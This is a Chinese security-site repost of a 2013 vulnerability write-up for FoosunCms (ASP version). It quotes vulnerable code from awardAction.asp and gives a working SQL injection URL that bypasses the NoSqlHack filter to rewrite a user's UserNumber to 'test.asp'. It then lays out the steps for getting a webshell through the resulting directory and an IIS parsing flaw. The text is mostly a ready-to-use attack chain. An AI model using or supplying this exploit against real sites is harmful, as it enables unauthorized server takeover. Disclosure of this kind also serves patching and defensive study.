热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

FoosunCms的asp版本getshell

发布时间:2013-12-29 21:40文章来源:网络文章作者:0day5 点击次数:
摘要:漏洞作者: 0day5 漏洞类型:Getshell 简要描述: 在文件\User\award\awardAction.asp中: Integral = NoSqlHack (request.QueryString(Integral)) if action = join then User_Conn.execute(InsertintoFS_ME_User_Prize(prizeid,usernumber,awardID)values(...

漏洞作者: 0day5

漏洞类型:Getshell
简要描述:

在文件\User\award\awardAction.asp中:

  1. Integral=NoSqlHack(request.QueryString("Integral")) 
  2.   
  3. if action="join" then 
  4.   
  5. User_Conn.execute("Insert into FS_ME_User_Prize (prizeid,usernumber,awardID) values("&CintStr(prizeID)&",'"&session("FS_UserNumber")&"',"&CintStr(awardID)&")") 
  6.   
  7. '获得当前参加人数-------------------------------- 
  8.   
  9. User_Conn.execute("Update FS_ME_Users set Integral=(Integral-"&Integral&") where usernumber='"&session("FS_UserNumber")&"'") 

请直接无视NoSqlHack,由于sql注入是发生在update语句中,所以我们可以修改表S_ME_Users的任意记录的任意字段信息

请直接无视NoSqlHack,由于sql注入是发生在update语句中,所以我们可以修改表S_ME_Users的任意记录的任意字段信息

3

webshell还可以用来代替access

我们文件管理中上传个图片文件:

http://192.168.1.101/UserFiles/27015564I69/2013_09_27_01_10_0390446.jpg

UserNumber就是等于27015564I69

通过以上的sql注入漏洞,直接update为test.asp

http://192.168.1.101/User/award/awardAction.asp?action=join&awardID=1&prizeID=1&Integral=1),UserNumber=0x74006500730074002E00610073007000,sex=(1

2

退出再重新登录

1

生成test.asp目录,后续上传的文件都会保存在该文件中

利用iis解析漏洞获取webshell

4

标签分类:

上一篇:appcms 最新版 1.3.708 任意文件下载
下一篇:记事狗微博二次注射漏洞